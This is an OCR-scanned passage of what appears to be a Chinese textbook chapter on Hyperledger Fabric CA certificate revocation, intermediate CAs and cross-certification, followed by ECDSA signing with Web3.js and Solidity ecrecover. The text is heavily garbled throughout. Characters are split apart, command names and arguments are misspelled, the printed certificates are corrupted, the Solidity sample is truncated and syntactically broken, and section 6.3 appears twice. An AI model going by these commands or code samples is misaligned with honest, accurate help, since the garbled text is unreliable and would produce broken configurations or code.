当 证 书 失 效 或 节点 不 存在 时 ， 需 要 注销 证 书 。 注 销 证 书 的 命令 如 下 。 





fabric-ca-client revoke -e <enrollment id> -r <reason> 





其 中 reason 参 数 可 以 为 : 
“ keycompromise; 
”cacomptomise ; 

* aff iliationchange ; 

“ Supetseded ; 
”cessationofopetation ; 
”cettif icatehold ; 

“ fremovefromct+! ; 

“ privilegewithdrawn,; 
* aacompromise,; 

“ unspecif ied。 


下 面试 着 注销 掉 刚 刚 登 记 的 admin2 节 点 。 执 行 命令 fabric-ca-client revoke-e admin2， 结 果 如 图 6-21 所 示 。 


admin2|32a42db46338d9a307aefbd6a92178e40d81e9d1|f2643198ea28e9b7f1laale9b46648a2ca4f2f889| |revoked|90|2t 
18-06-26 16:15:00+6060:00|12017-06-26 16:29:19| BEGIN CERTIFICATE 
MIICRijCCAeygAwIBAgIUMqQttGM4AOKMHrvvQqSF45A2B6dEwCgYIKoZIzjOEAwIw 
aDELMAkGA1UEBhMCVVMxFzAVBgNVBAgTDKkSvcnRoIENhcm9saWShMRQwEgYDVQQK 
EwtIeXBlcmxlZGdlcjEPMAOQGA1UECxMGRmFicml jMRkwFwYDVQQDExBmYWJyaWMt 
Y2Etc2VydmVyMB4XDTE3MDYyNjE2MTUwMFoXDTE4MDYyNjE2MTUwMFowXjELMAKkG 
A1UEBhMCVVMxFzAVBgNVBAgTDk5vcnRoIENhcm9saW5hMRQwEgYDVQQKEwtIeXBL 
cmxlZGdlcjEPMAOGA1UECxMGRmFicml jMQ8wDQYDVQQDEwZhZG1pbjIwWTATBgcq 
hkjOPQIBBggqhk jOPQMBBwNCAAQIfdnOIz1Y77WfBAZq41603WK9w6YFYKrPevHu 
jWZNOIHUG9FLFhQOCAYtOTa7 lqposVrKLq7ATROJzzEmI8pyo34wfDAOBgNVHQ8B 
Af8EBAMCAgQwDAYDVROTAQH/BAIwADAdBgNVHQ4EFgQU1bDmMUMOSf6cb3ecNxIZ 
ik4LGZEwHwYDVROjBBgwFoAU8mQxmOoo6bfxqh6bRmSKLKTy+IkwHAYDVRORBBUw 
E4IRYW]JjLVRoaW5rUGFkLVgyMDEwCgYIKoZIzjo9EAwIDSAAwRQIhAIC/bNb79ILY 
g/ghXij/N4AK6WrVS5T+ykguEtUN+nuP53VAiLBK8H/nD13nWBRWaO0oLijOCrUZrgQcMk 
7hRAjE1UILrEzA== 

END CERTIFICATE 





图 6-21 注销 证 书 


执行 完 以 上 命令 之 后 ， 可 以 看 出 admin2 节 点 的 证 书 状 态 已 经 改 为 注销 了 。 


还 有 一 种 机 制 是 注册 一 个 中 间 CA， 具 体 命 令 如 下 。 








fabric-ca-server start -b adminl:aqdminpwl -u http:// admin:adminpw@localhost:7054 








上 述 命令 重新 局 动 了 一 个 CA 服务 器 ， 作 为 引导 节点 CA 服务 器 下 的 中 间 CA， 执 行 结果 如 图 6-22 所 示 。 


root@abc-ThinkPad-X201: /home/abc# fabric-ca-server start -b admini:adminpwl1 -uh 
ttp://admin:adminpw@localhost:7054 

2017/06/27 21:52:52 [INFO] Configuration file location: /home/abc/ca-serverl/fat 
ric-ca-server-config.yaml 

2017/06/27 21:52:52 [INFO] Starting server in home directory: /home/abc/ca-serve 
rl1 

2017/06/27 21:52:52 [INFO] The CA key and certificate already exist 

2017/06/27 21:52:52 [INFO] The key is stored by BCCSP provider 'SW' 

2017/906/27 21:52:52 [INFO] The certificate is at: /home/abc/ca-serveri/ca-cert.r 
em 

2017/06/27 21:52:52 [INFO] Initialized sqlite3 database at /home/abc/ca-server1l/ 
fabric-ca-server.db 

2017/06/27 21:52:52 [INFO] Home directory for default CA: /home/abc/ca-serverl 
i 21:52:52 [INFO] Listening on http://0.0.0.0:7055 





图 6-22 ”注册 中 间 CA 


服务 器 端 接 收 到 的 消息 以 及 执行 结果 如 图 6-23 所 示 。 


2017/06/27 21:52:01 [INFO] signed certificate with serial number 403947240151599 
198448008271366810938314601372647 


A did 21:52:01 [INFO] 127.0.0.1:454607 - "POST /enroll"” 200 





图 6-23 ”服务 器 端 消息 


打开 ca-chain.pem， 查 看 刚刚 登记 的 中 间 CA 服 务 器 证 书 链 ， 如 图 6-24 所 示 。 


root@abc-ThinkPad-X201:# cat ca-chain.pem 

BEGIN CERTIFICATE 
MIICFzCCAb2gAwIBAgIUDtOc5IJMJysV3m6AqI0jiLCalevkwCgYIKoZIzjOEAwIw 
aDELMAKkGA1UEBhMCVVMxFzAVBgNVBAgTDk5vcnRoIENhcm9saW5hMRQwEgYDVQQK 
EwtIeXBLcmxLZzadLcjEPMAOGCA1UECxMCRmFiLcmLjMRkwFwYDVQQDExBmYWJyaWMt 
Y2Etc2VydmVyMB4XDTE3MDYyNjEOQNDAwMFoXDTMyMDYyMjEOQNDAwMFowaDELMAKkG 
A1UEBhMCVVMxFzAVBgNVBAgTDk5vcnRoIENhcm9saW5hMRQwEgYDVQQKEwtIeXBL 
cmxlZGdlcjEPMAOGA1UECxMGRmFicmlL jMRkwFwYDVQQDExBmYWJyaWMtY2Etc2Vy 
dmVyMFkwEwYHKoZIzjOCAQYIKoZIzjODAQCcDQgAEVZCeXvv3K9Ydq321XGQzoy6f 
F+YN60S5WW9WO99e32UZTa8juDxxCIoOTHeHpMGTklcyNcn6M8tbV9SWhSZLqlLKNF 
MEMwDgYDVROPAQH/BAQDAgEGMBIGA1UdEwEB/wQIMAYBAf8CAQEwHQYDVROOBBYE 
FPJkMZjqKOm38aoemOZkiiyk8viJMAoGCCqGSM49BAMCAQgAMEUCIQCPYzfscgNc 
N8Ay1c1bMxtxqULrcirPYKn7t5iNW/7NrhwIgQjyzxSnBXStYrSLoxLCnw+8BIoQw 
70KtfWdTeKCyb46= 

END CERTIFICATE 

BEGIN CERTIFICATE 
MIICLDCCAdOgAwIBAgIURsGeSxI2r1iuNJmFhgFxBcETpm+CcwCgYIKoZIzjOEAwIw 
aDELMAkGA1UEBhMCVVMxFzAVBgNVBAgTDkSvcnRoIENhcm9saWS5ShMRQwEgYDVQQK 
EwtIeXBlcmxlZGdlcjEPMAOQGA1UECxMGRmFicml jMRkwFwYDVQQDExBmYWJyaWMt 
Y2Etc2VydmVyMB4XDTE3MDYyNzEzNDcwMFoXDTIyMDYyNjEzNDcwMFowXTELMAKkG 
A1UEBhMCVVMxFzAVBgNVBAgTDk5vcnRoIENhcm9saW5hMRQwEgYDVQQKEwtIeXBL 
cmxlZGdlcjEPMAOGA1UECxMGRmFicmlL jMQ4wDAYDVQQDEwVhZG1ipbjBZMBMGByqG 
SMA9AgEGCCqGSM49AwEHAQOIABGW/IGvGz67Kiv2af/XyoEQjELdkhTf3iRjpOGKx 
WynadUa+oSuKnC1lixgkfVYkXYGtdvQNYKqyZH9f99k8em6oMejZjBkMA4GA1UdDwEB 
/wQEAwICBDASBgNVHRMBAf8ECDAGAQH/AgEAMBOGA1UdDgQWBBRSq9cp7MuXcXb1 
Zz8trv+8EzT4uCczAfBgNVHSMEGDAWgBTyZDGY6iLjpt/GqHptCGZIospPL4LTAKBggq 
hkjOPQQDAgNHADBEAiBC+yyrw/cijilB/DopeQ9WJaMnfGXdWijTcbukuTf+Bwr4QIg 
R8qLoEsZDSbRn9tV+7CX3Mnz3td7fi29Up+1gXDtCFc= 

END CERTIFICATE 
root@abc-ThinkPad-X201:# 国 





图 6-24 服务 器 证 书 链 信 息 


可 以 看 到 证 书 链 中 包含 上 级 CA 证 书 和 自己 的 证 书信 息 。 尝 试 在 刚刚 建立 的 CA 上 注册 登记 一 个 节点 ， 注 册 一 个 节点 admin2 的 命令 同上 。 首 先 登记 节点 ， 如 图 6-25 所 示 。 


root@abc-ThinkPad-X201: /home/abc# fabric-ca-client enroll -uyu http://admin:adminp 
wQ@LocaLhost:7655 

2017/06/27 22:25:49 [INFO] User provided config file: /home/abc/ca-client1/fabri 
c-ca-client-config.yaml 

2017/06/27 22:25:49 [INFO] generating key: &{A:ecdsa S:256} 


2017/06/27 22:25:49 [INFO] encoded CSR 

2017/06/27 22:25:49 [INFO] Stored client certificate at /home/abc/ca-clienti/ms 
/signcerts/cert.pem 

2017/06/27 22:25:49 [INFO] Stored CA certificate chain at /home/abc/ca-client1/ 
sp/cacerts/localhost-7055 .pem 





图 6-25 ”在 新 的 CA 上 登记 节点 


登记 完 节 点 后 ， 在 中 间 CA 上 进行 注册 ， 命 令 如 下 。 




















fabric-ca-client register --id.name aqmin2 --id.type user --id.affiliation orgl. 
departmentl1 --id.attrs "hf.Revoker=truey foo=bar' 














结果 如 图 6-26 所 示 。 


root@abc-ThinkPad-X201: /home/abc# fabric-ca-client register --id.name admin2 --i 
d.type user --id.affiliation orgl.department1 --id.attrs 'hf.Revoker=true ,foo=bz 
a 

2017/06/27 22:29:57 [INFO] User provided config file: /home/abc/ca-client1/fabri 


c-ca-client-config.yaml 

2017/06/27 22:29:57 [INFO] Configuration file location: /home/abc/ca-client1/fat 
ric-ca-client-config.yaml 

Password: OvcuMeebLLty 





图 6-26 ”注册 节点 


检测 数据 库 中 注册 的 结果 。 打 开 数 据 库 ， 可 以 看 到 如 图 6-27 所 示 结 果 ， 节 点 在 新 的 CA 上 注册 成 功 了 。 


root@abc-ThinkPad-X2601:# sqlite3 fabric-ca-server.db 
SsQLite version 3.8.2 2013-12-06 14:53:30 

Enter ".help" for instructions 

Enter SQL statements terminated with a 
sqlite> select * from users; 
admin|adminpw|client||[{"name":"hf.Registrar.DelegateRoles","valuyue":"client,user 


,Validator ,auditor"},{"name":"hf.Revoker","value":"1"},{"name":"hf.IntermediateC 
A","value":"1"},{"name":"hf.Registrar.Roles","value":"client,user ,peer ,validator 
,auditor"}]|1|-1 

admin2|OvcuMeebLLty|user|orgl.department1|[{"name":"hf.Revoker","value":"true"}, 


{"name":"foo","value":"bar"}]19|-1 





图 6-27 “数据库 中 的 注册 信息 








fabric-ca-client enroll -u http:// admin2:OvcuMeebLLty@localhost:7055 -M $FABRIC 
CA CLIENT HOME/msp 





























结果 如 图 6-28 所 示 。 


root@abc-ThinkPad-X201: /home/abc# fabric-ca-client enroll -yu http://admin2:OvcuM 
eebLLty@localhost:7055 -M $FABRIC_CA_CLIENT_HOME/msp 

2017/66/27 22:38:09 [INFO] User provided config file: /home/abc/ca-client4/fabri 
c-ca-cClient-config.yaml 

2017/066/27 22:38:09 [INFO] Created a default configuration file at /home/abc/ca- 
client4/fabric-ca-client-config.yaml 

2017/066/27 22:38:09 [INFO] generating key: &{fA:ecdsa S:256} 

2017/066/27 22:38:09 [INFO] encoded CSR 

2017/906/27 22:38:699 [INFO] Stored client certificate at /home/abc/ca-client4/msp 
/signcerts/cert.pem 

2017/06/27 22:38:699 [INFO] Stored CA certificate chain at /home/abc/ca-client4/m 
sp/cacerts/localhost-7055.pem 





图 6-28 登记 节点 信息 


进入 刚刚 登记 的 节点 目录 ， 生 成 如 图 6-29 所 示 的 目录 结构 。 


fabric-ca-client-config.yaml 
msp 

cacerts 

[一 localhost-7055.penm 


keystore 
[一 b641fdf1l4ac61e8c99e5ad1ld4de2d3d01cebgocb7b27251b19999472698adf67d sk 
signcerts 

cert.pem 





图 6-29 ”目录 结构 


打开 cacerts 下 面 的 证 书 链 文件 ， 可 以 看 到 如 图 6-30 所 示 的 信息 。 


由 图 6-30 可 以 看 出 ， 刚 刚 登 记 的 节点 证 书 链 包含 两 个 中 间 CA 的 数字 证 书信 息 。 在 验证 由 该 树 形 CA 服 务 器 中 一 个 中 间 CA 节 点 所 颁发 的 数字 证 书 是 否 真实 有 效 时 ， 会 按照 证 书 链 自 下 向 上 进行 验证 ， 直 
至 到 达 根 证 书 。 如 果 区 块 链 网 络 中 有 多 条 链 ， 每 条 链 为 了 保证 各 自 的 隐私 性 存在 各 自 的 CA 服务 器 ， 那 么 当 一 个 用 户 同时 拥有 两 条 链 的 权限 时 ， 怎 样 同时 验证 两 条 链 上 的 节点 所 拥有 的 CA 证 书 呢 ? 按照 上 边 
证 书 链 的 原则 ， 一 个 节点 注册 登记 到 一 个 中 间 CA 后 ， 应 该 只 能 拥有 该 条 CA 服务 器 链 上 的 证 书 链 。 要 解决 这 个 问题 ， 有 一 种 方法 是 交叉 认证 。 在 fabric-ca 中 也 有 类 似 的 操作 方法 ， 即 通过 RESTful 接 口 获取 
另外 一 个 CA 服务 器 上 的 证 书 链 。 具 体 命令 为 : 






































fabric-ca-client getcacert -u http:// localhost:7055 -M $FABRIC CA CLIENT HOME/msp 





root@abc-ThinkPad-X201:# cat msp/cacerts/localhost-79055.pem 

BEGIN CERTIFICATE 
MIICFzCCAb2gAwIBAgIUDtOc5IJMJysV3m6AqI0jiLCalevkwCgYIKoZIzjOEAwIw 
aDELMAkGA1UEBhMCVVMxFzAVBgNVBAgTDk5vcnRoIENhcm9saW5hMRQwEgYDVQQK 
EwtIeXBLcmxLZzadLcjEPMAOGCA1UECxMGRmFiLcmLjMRkwFwYDVQQDExBmYWJyaWNMt 
Y2Etc2VydmVyMB4XDTE3MDYyNjEOQNDAwMFoXDTMyMDYyMjEOQNDAwMFowaDELMAKkG 
A1UEBhMCVVMxFzAVBgNVBAgTDk5vcnRoIENhcm9saW5hMRQwEgYDVQQKEwtIeXBL 
CmXxLZadLcjEPMAO9CA1UECxMGRmFiLcmLjMRkwFwYDVQQDExBmYWJyaWMtY2Etc2Vy 
dmVyMFkwEwYHKoZIzjOCAQYIKoZIzjODAQCDQgAEVZCeXvv3K9Ydq321XGQzoy6f 
F+YN60S5WW9WO99e32UZTa8juDxxCIoOTHeHpMGTkLlcyNcn6M8tbV9SWhSZLqLKNF 
MEMwDgYDVROPAQH/BAQDAgEGMBIGA1UdEwEB/wQIMAYBAf8CAQEwHQYDVROOBBYE 
FPJkMZjqKOm38aoemOZkiiyk8viJMAoOGCCqGSM49BAMCAQgAMEUCIQCPYzfscgNc 
N8Ay1c1bMxtxqULrcirPYKn7t5iNW/7NrhwIgQjyzxSnBXStYrSLoxLCnw+8BIoQw 
70KtfwdTeKCyb46= 

END CERTIFICATE 

BEGIN CERTIFICATE 
MIICLDCCAdOgAwIBAgIURsGeSxI2r1iuNJmFhgFxBcETpm+cwCgYIKoZIzjOEAwIw 
aDELMAKkCA1UEBhMCVVMxFzAVBgNVBAgTDk5vcnRoIENhcm9saW5hMRQwEgYDVQQK 
EwtIeXBLcmxLZzaGdLcjEPMAOCA1UECxMGRmFiLcmLjMRkwFwYDVQQDExBmYWJyaWMt 
Y2Etc2VydmVyMB4XDTE3MDYyNzEzNDcwMFoXDTIyMDYyNjEzNDcwMFowXTELMAKkG 
A1UEBhMCVVMxFzAVBgNVBAgTDk5vcnRoIENhcm9saW5hMRQwEgYDVQQKEwtIeXBL 
cmxlZGdlcjEPMAOGA1UECxMGRmFicmlL jMQ4wDAYDVQQDEwVhZG1pbjBZMBMGByqG 
SMA9AgEGCCqGSM49AwEHAQOIABGW/IGvGz67Kiv2af/XyoEQijELdkhTf3iRjpOGKx 
WynadUa+oSuKnClxgkfVYkXYGtdvQNYKqyZH9f99kem6oMejZjBkMA4GA1UdDwEB 
/wQEAwICBDASBgNVHRMBAf8ECDAGAQH/AgEAMBOGA1UdDgQWBBRS5Sq9cp7MuXcXb1 
Zz8trv+8EzT4uCczAfBgNVHSMEGDAWgBTyZDGY6iLjpt/GqHptCZIospPL4iLTAKBggq 
hkjOPQQDAgNHADBEAiLBC+yyrw/cijilB/DopeQ9WJaMnfGXdWijTcbukuTf+Bwr4QIg 
R8qLoEsZDSbRn9tV+7CX3Mnz3td7fi29Up+1gXDtCFc= 

END CERTIFICATE 





图 6-30 证书 链 信息 


在 此 新 建 一 个 单独 运行 的 CA 服务 器 ， 如 图 6-31 所 示 。 


root@abc-ThinkPad-X201: /home/abc/ca-server3# fabric-ca-server start -b admin3:pa 
sswd3 

2017/06/27 22:28:19 [INFO] Configuration file location: /home/abc/ca-server3/fab 
ric-ca-server-config.yaml 
2017/06/27 22:28:10 [INFO] Starting server in home directory: /home/abc/ca-serve 
『3 

2017/06/27 22:28: [INFO] The CA key and certificate already exist 


2017/06/27 22:28: [INFO] The key is stored by BCCSP provider 'SW' 
2017/06/27 22:28: [INFO] The certificate is at: /home/abc/ca-server3/ca-cert.p 
em 
2017/06/27 22:28: [INFO] Initialized sqlite3 database at /home/abc/ca-server3/ 
fabric-ca-server. 

2017/06/27 22:28: [INFO] Home directory for default CA: /home/abc/ca-server3 
ee een [INFO] Listening on http://0.0.0.0:7056 








图 6-31 运行 CA 服务 器 


查看 该 根 服务 器 的 数字 证 书 ， 如 图 6-32 所 示 。 


root@abc-ThinkPad-X201:# cat ca-cert.pem 

BEGIN CERTIFICATE 
MIICFzCCAb2gAwIBAgIUL2BIj9VKv3BAIPpbdC4zmO4KwXcwCgYIKoZIzjOEAwIw 
aDELMAKkGA1UEBhMCVVMxFzAVBgNVBAgTDk5vcnRoIENhcm9saW5hMRQwEgYDVQQK 
EwtIeXBlcmxlZGdlcjEPMAOGA1UECxMGRmFicmL jMRkwFwYDVQQDExBmYWJyaWMt 
Y2Etc2VydmVyMB4XDTE3MDYyNzE@MjIwMFoXDTMyMDYyMzE@MjIwMFowaDELMAKkG 
A1UEBhMCVVMxFzAVBgNVBAgTDk5vcnRoIENhcm9saW5hMRQwEgYDVQQKEwtIeXBL 
CmXxLZzadLcjEPMAOGCA1UECxMGRmFiLcmLjMRkwFwYDVQQDExBmYWJyaWMtY2Etc2Vy 
dmVyMFkwEwYHKoZzIzjoCAQYIKoZzIzjoDAQcDQgAEYe66LQyy7v9cuptL9d7UEFpN 
62SQuchqjx1ibzIpJx9zQgvfGpjFapeart8Y1jyLv1iHDxEripPC4EnOnnLDdpD8qNF 
MEMwDgYDVROPAQH/BAQDAgEGMBIGA1UdEwEB/wQIMAYBAf8CAQEwHQYDVROOBBYE 
FEKLFXifjogIfpBTVshnnQ1lpzn15MAoGCCqGSM49BAMCAOgAMEUCIQCrrRsDa7k5 
5F7fSGyNRmX57BF779KhCSshIEfZzkQ9AJ/QIgNKXDf54RDPdHqXLI99gyko/t030o 
L7g6Z3enE9+Fit4= 

END CERTIFICATE 





图 6-32 ” 根 服 务 器 的 数字 证 书 


接 下 来 ， 在 上 文登 记 的 节点 admin2 上 运行 获取 刚刚 建立 的 CA 服务 器 证 书 链 命令 ， 如 图 6-33 所 示 。 


root@abc-ThinkPad-X201: /home/abc# fabric-ca-client getcacert -U http:/ /LocaLhos1 
:7056 -M $FABRIC CA CLIENT HOME/msp 

2817/966/27 22:55:28 [INFO] User provided config file: /home/abc/ca-client4/fabri 
c-ca-client-config,.yaml 

28017/966/27 22:55:28 [INFO] Configuration file location: /home/abc/ca-client4 /fat 
ric-ca-client-config.yaml 

2817/966/27 22:55:28 [INFO] Stored CA certificate chain at /home/abc/ca-client4/r 
sp/cacerts/localhost-7656.pem 





图 6-33 ”获取 证 书 链 


执行 命令 结束 后 ， 查 看 admin2 节 点 所 对 应 的 证 书 链 目 录 ， 如 图 6-34 所 示 。 


cacerts 
LocaLhost-7955.pem 
LocaLhost-7656 .pem 
keystore 


-一 b641fdfl4ac6le8c99e5adld4de2d3d901lceb@cb7b27251b19999472698adf67d sk 
slgncerts 
cert.pem 





图 6-34 ”查看 admin2 节 点 所 对 应 的 证 书 链 目 录 


可 以 看 到 启动 在 端口 7056 上 的 CA 服务 器 所 对 应 的 证 书 链 已 经 同步 过 来 了 。fabric-ca 模 块 详细 描述 了 CA 工作 过 程 中 使 用 fabric-ca-client 和 SDK 的 方法 ， 其 中 包括 LDAP 以 及 其 他 数据 库 的 配置 方法 。 
SDK 方 式 的 RESTful 操 作 接 口 ， 可 以 查看 fabric-ca 源 码 根 目录 下 的 swagger.json 文 件 。 使 用 中 需要 根据 区 块 链 网 络 的 特性 ， 使 用 CA 签 友 的 数字 证 书 进行 认证 、 加 密 传输 数据 、 授 权 用 户 、 管 理 用户 证 书 。 


6.3 ”区 块 链 交易 签名 


6.3.1 ”数字 等 名 与 交易 安全 


为 了 保证 交易 信息 在 网 络 传输 过 程 中 的 完整 性 以 及 安全 性 ， 区 块 链 采 用 了 多 种 加 密 手段 。 其 中 数字 签名 就 是 保证 交易 信息 安全 最 重要 的 手段 。 


数字 签名 涉及 公 铜 、 私 铀 和 钱包 等 工具 。 它 有 两 个 作用 : 一 是 证 明 消 息 确实 是 由 信息 发 送 方 签名 并 发 出 来 的 ， 二 是 确定 消息 的 完整 性 。 数 字 签 名 技术 是 指 将 摘要 信息 用 发 送 者 的 私 钥 加 密 ， 与 原文 一 
起 传送 给 接收 者 。 接 收 者 只 有 用 发 送 者 的 公 钥 才能 解密 被 加 密 的 摘要 信息 ， 然 后 对 收 到 的 原文 用 哈 希 函数 产生 一 个 摘要 信息 ， 与 解密 的 摘要 信息 进行 对 比 。 如 果 相 同 ， 则 说 明 收 到 的 信息 是 完整 的 ， 在 传 
输 过 程 中 没有 被 修改 ; 否则， 说 明 信 息 被 修改 过 。 因 此 ， 数 字 签名 能 够 验证 信息 的 完整 性 。 


比特 币 和 以 太 坊 是 通过 椭圆 曲线 加 密 算法 实现 数字 签名 的 。 所 有 的 交易 信息 均 需 要 发 起 者 通过 私 钥 签 发 ， 其 他 人 通过 非 对 称 的 公 钥 验 证 消息 的 真实 性 。 下 面 介绍 椭圆 曲线 加 密 算法 ， 并 使 用 以 太 坊 提 
供 的 工具 对 要 发 送 的 数据 进行 数字 签名 ， 以 及 使 用 Solidity 区 块 链 编程 语言 的 ecrecover() 校 验 数 字 签 名 的 合法 性 。 


1. 椭 圆 曲 线 DSA (ECDSA) 简介 
假如 Alice 要 对 消息 m 加 上 数字 签名 ， 而 Bob 需 要 验证 该 签名 。 
(1) 生成 数字 签名 
1) Alice 根 据 随机 数 r 和 基点 G 求 出 点 rG=(xy); 
2) Alicce 根 据 随机 数 r、 消 息 m 的 散 列 值 h 和 私 钥 a 计 算 ; 
3) Alice 将 消息 m、 点 rG=(%,y) 和 s 发 送 给 Bob， 其 中 点 rG 和 s 就 是 数字 签名 。 
(2) 验证 数字 签名 
1) Bob 接 收 到 消息 m、 点 rG= (x,y) 和 和 ls; 
2) Bob 根 据 消息 求 出 散 列 值 h; 


3) Bob 根 据 上 述 信 息 ， 用 Alice 的 公 是 进行 以 下 计算 。 


ht+a 











最 后 让 上 述 计 算 结果 与 rG 进 行 比 较 ， 看 是 否 相 等 。 


如 果 签 名 结果 正确 ， 则 计算 结果 应 如 下 所 示 。 











十 UX 





大 体 上 来 说 ， 对 于 要 签名 的 数据 m， 使 用 其 哈 希 后 的 结果 h， 会 生成 签名 。 签 名 结果 分 为 [r”s、v 3 段 值 。 其 中 r、s 为 32 字 节 ，v 为 1 字 节 。 如 果 要 用 ecrecover() 算 法 来 验 签 ， 需 对 v 值 加 27 来 组 成 27、 
28 这 两 个 值 中 的 一 个 。 


2. 实 践 : 使 用 Web3.js 进 行 数字 签名 
以 太 坊 提供 了 web3.eth.sign 方 法 ， 用 来 对 数据 生成 数字 签名 。 例 如 : 


var Web3 
Var web3 


= require (‘web3’ ) ， 

= new Web3 (new Web3.providers.HttpProvider (“hnttp:// localhost:8545”)); 
Var account = web3.eth.accounts[0]; 

Var sha3Msg = web3.sha3 (“abc”); 

Var sighedData = web3.eth.sigh(account, sha3Msg); 


console.1log(“account: ”+ account) ; 
console.log(“sha3 (message): ”+ sha3Msg); 
console.log(“Signed data: ”+ signedData); 

















在 上 面 的 代码 中 ， 先 将 要 签名 的 数据 abc 生 成 哈 希 串 ， 使 用 web3.sha3("abc") 来 完成 。 接 着 使 用 当前 连接 节点 的 第 一 个 默认 账户 进行 签名 。 由 于 在 此 使 用 的 是 EtherumJs TestRPC， 它 默认 打开 了 账 
户 ; 否则 ， 还 需要 web3.personal.unlockAccount("0x.","",1000) 来 打开 数字 签名 所 使 用 的 账户 。 需 要 注意 的 是 ， 当 你 打开 你 的 账户 时 ， 可 能 有 安全 风险 。 因 为 其 他 程序 也 可 以 通过 访问 节点 进行 类 似 的 签 
名 ， 这 意味 着 它们 可 以 伪造 你 的 数据 ， 包 括 以 你 的 名 义 发 起 交易 ， 转 走 你 的 钱 。 


(1) 使 用 ecrecover() 对 签名 数据 进行 校 验 


ecrecover() 函 数 是 由 以 太 坊 提供 的 一 个 全 局 遂 数 ， 用 于 签名 数据 的 校 验 。 与 上 面 所 陈述 的 方式 略 有 不 同 的 是 ， 这 个 函数 返回 的 是 签名 者 的 公 y 匙 地址。 如 果 返 回 结果 是 签名 者 的 公 是 地址， 那么 说 明 数 
据 是 正确 的 。ecrecover() 函 数 定义 如 下 : 


ecrecover (bytes32 hash, uint8 v, bytes32 r, bytes32 s) returns (address) 


ecrecover() 孙 数 需要 4 个 参数 : 需要 被 签名 数据 的 哈 希 结果 值 和 r、s、v 值 。 其 中 ，r、Ss、Yv 分 别 来 自 签名 结果 串 。 
其 中 v 取 出 来 的 值 或 者 是 00， 或 者 是 01。 要 使 用 时 ， 先 要 将 其 转换 为 整 型 ， 再 加 上 27， 人 得 到 27 或 28。 在 调用 函数 时 ，v 将 填 入 27 或 28。 
(2) 使 用 Solidity 的 ecrecoverDecode() 验 证 签名 的 完整 示例 如 图 6-35 所 示 。 


上 述 代码 使 用 I 临 时 写 的 slice() 函 数 把 数字 签名 中 的 rs、v 切 割 出 来 。 由 于 返回 的 仍 是 bytes 类 型 ， 所 以 使 用 bytesToBytes32() 进 行 类 型 转换 。 另 外 需要 注意 的 是 ecrecoverDecode(， 根 据 前 面 的 说 
明 ， 需 要 对 v 值 加 上 27 后 绸 进行 调用 。 最 后 调用 decode() 函 数 ， 得 到 公 钥 0x60320b8a71bc314404ef7d194ad8cacobee1e331。 


// 恰 磺 舶 数据 入 段 切 和 前 出 此 是 长 度 
function slice{bytes memory data, uint start, uint len) returns (bytes)t{ 
bytes memory b = new bytes(len); 


for(uint i = 6; i < len; i++){ 
b[i] = data[i + start]; 
} 


return b: 


// 僵 有 褒 ecrecover 惰 和 章 公 纪 


function ecrecoverDecode(bytes32 r, bytes32 s, byte v1) returns (address addr){ 
uint8 v = uint8(v1) + 27; 
addr = ecrecover (hex"4e03657aea45a94fc7d47ba826c8d667cOdle6be33a64a036ec44f58fa 


// 从 bytes 知 规 罗 bytes32 
function bytesToBytes32(bytes memory source) returns (bytes32 result) { 
assembly { 
result := mload(add(source, 32)) 





图 6-35 ectecovetDecode0 示例 代码 


6.3 ”区 块 链 交易 签名 


6.3.1 ”数字 签名 与 交易 安全 


为 了 保证 交易 信息 在 网 络 传输 过 程 中 的 完整 性 以 及 安全 性 ， 区 块 链 采 用 了 多 种 加 密 手段 。 其 中 数字 签名 就 是 保证 交易 信息 安全 最 重要 的 手段 。 


数字 签名 涉及 公 钥 、 私 钥 和 钱包 等 工具 。 它 有 两 个 作用 : 一 是 证 明 消 息 确实 是 由 信息 发 送 方 签名 并 发 出 来 的 ， 二 是 确定 消息 的 完整 性 。 数 字 签 名 技术 是 指 将 摘要 信息 用 发 送 者 的 私 钥 加 密 ， 与 原文 一 
起 传送 给 接收 者 。 接 收 者 只 有 用 发 送 者 的 公 钥 才能 解密 被 加 密 的 摘要 信息 ， 然 后 对 收 到 的 原文 用 哈 希 函数 产生 一 个 摘要 信息 ， 与 解密 的 摘要 信息 进行 对 比 。 如 果 相 同 ， 则 说 明 收 到 的 信息 是 完整 的 ， 在 传 
输 过 程 中 没有 被 修改 ; 否则， 说 明 信 息 被 修改 过 。 因 此 ， 数 字 签 名 能 够 验证 信息 的 完整 性 。 


比特 币 和 以 太 坊 是 通过 椭圆 曲线 加 密 算法 实现 数字 签名 的 。 所 有 的 交易 信息 均 需 要 发 起 者 通过 私 钥 签发 ， 其 他 人 通过 非 对 称 的 公 钥 验证 消息 的 真实 性 。 下 面 介绍 椭圆 曲线 加 密 算法 ， 并 使 用 以 太 坊 提 
供 的 工具 对 要 发 送 的 数据 进行 数字 签名 ， 以 及 使 用 Solidity 区 块 链 编程 语言 的 ecrecover() 校 验 数字 签名 的 合法 性 。 
1. 根 圆 曲 线 DSA (ECDSA) 简介 

假如 Alice 要 对 消息 m 加 上 数字 签名 ， 而 Bob 需 要 验证 该 签名 。 

(1) 生成 数字 签名 

1) Alice 根 据 随机 数 r 和 基点 G 求 出 点 rG=(%y); 

2) Alicce 根 据 随机 数 r、 消 息 m 的 散 列 值 h 和 私 钥 a 计算 ; 

3) Alice 将 消息 m、 点 rG=(%y) 和 s 发 送 给 Bob， 其 中 点 rG 和 s 就 是 数字 签名 。 

(2) 验证 数字 签名 

1) Bob 接 收 到 消息 m、 点 rG= (x,y) 和 ls; 


2) Bob 根 据 消息 求 出 散 列 值 h; 


3) Bob 根 据 上 述 信 息 ， 用 Alice 的 公 匙 进行 以 下 计算 。 








最 后 让 上 述 计算 结果 与 rG 进 行 比较 ， 看 是 否 相等 。 


如 果 签 名 结果 正确 ， 则 计算 结果 应 如 下 所 示 。 





大 体 上 来 说 ， 对 于 要 签名 的 数据 m， 使 用 其 哈 希 后 的 结果 h， 会 生成 签名 。 签 名 结果 分 为 r”s、v 3 段 值 。 其 中 r、s 为 32 字 节 ，v 为 1 字 节 。 如 果 要 用 ecrecover() 算 法 来 验 签 ， 需 对 v 值 加 27 来 组 成 27、 


28 这 两 个 值 中 的 一 个 。 
2. 实 践 : 使 用 Web3.js 进 行 数字 签名 


以 太 坊 提供 了 web3.eth.sign 方 法 ， 用 来 对 数据 生成 数字 签名 。 例 如 : 


require (‘web3’ ) ; 


var Web3 = 
= new Web3 (new Web3.providers.HttpProvider (“hnttp:// localhost:8545”)); 


Var web3 


Var account = web3.eth.accounts[0]; 
Var sha3Msg = web3.sha3 (“abc”); 
Var sighedData = web3.eth.sigh(account, sha3Msg); 


console.1log(“account: ”+ account) ; 
console.log(“sha3 (message): ”+ sha3Msg); 
